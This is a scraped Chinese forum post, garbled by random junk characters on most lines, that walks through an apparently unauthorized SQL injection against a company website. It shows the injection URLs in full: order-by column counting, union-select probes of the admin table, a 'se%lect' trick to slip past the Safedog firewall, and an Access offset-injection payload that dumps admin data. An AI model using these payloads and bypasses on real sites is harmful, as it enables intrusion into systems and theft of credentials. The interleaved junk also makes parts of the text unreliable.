打开网站,一个企业站。
% o( ?$ ?3 }6 ^, B" T
5 y' z! e/ @! `0 _( B: w! p- b
. o1 L/ G: K* M, D2 `; D& ?顺手加个admin
( k6 a: g& {# l$ u3 v `3 P' w+ a, Z5 u% j, a% I3 A
: E: R/ n O- ~默认后台。+ p0 e0 l. a2 R5 B
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
; L [) g) Y; W. N& x2 R
) B& f1 x! m: l5 _( [2 [) j2 x* a; s+ P2 y% y8 u. u" J9 K k
0 D1 O# g' c1 _' T+ A
所以就不用御剑扫了,待会直接封IP。! Q W! Z7 g+ @3 k- |5 H( L# S
# m* e. P; n0 N2 U用order by语句判断是否存在注入。
6 a, E7 M6 E- P; ghttp://www.xxx.com /product_show.asp?id=997 order by 1, L V9 J! R- d; J
http://www.xxx.com /product_show.asp?id=997 order by 1007 h+ c3 E9 K/ l0 u8 D
现在存在注入,经测试后发现是9个字段。0 c! K# O; u" `' ^! y, n2 @- T7 f
3 z7 o& ~: W3 R7 r. @' E
接下来进行联合查询,猜是否存在admin表。9 w+ @! A3 w/ O* s5 @8 C
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。! _% W+ M) M: {' M
) L& U6 q. @/ K: p8 D+ L/ a2 W: G; ^0 h3 \% a
* D% h; h- t+ I6 N7 n在select中间加个%,se%lect绕过安全狗。: p( L5 l9 P0 g3 u$ c
" p" w+ \* @9 w0 O
# i0 ], d5 z) T& u7 `发现存在admin表,然后开始手工猜常用的字段。 [9 X( Z5 k8 N- h4 \
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
% t, q" t- g. }7 V5 N- ` " y3 j$ J) `" w) `' n' Z
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。$ ?+ W( Q' F/ z: x
5 O. j% x: d2 X0 `科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
3 W1 y7 O( t% P8 P# Ahttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin: ]8 r: m, q: e' C4 ^6 V \ @
好了,敏感内容出显了。2 h9 _ L, I- H- F- j- Q$ H: X/ Y
$ n4 U h2 o A2 r; l+ y! ^9 b8 ~/ Q* f: x2 g- T3 r) l9 D
9 |, K# s, w0 {9 N: R7 n, U |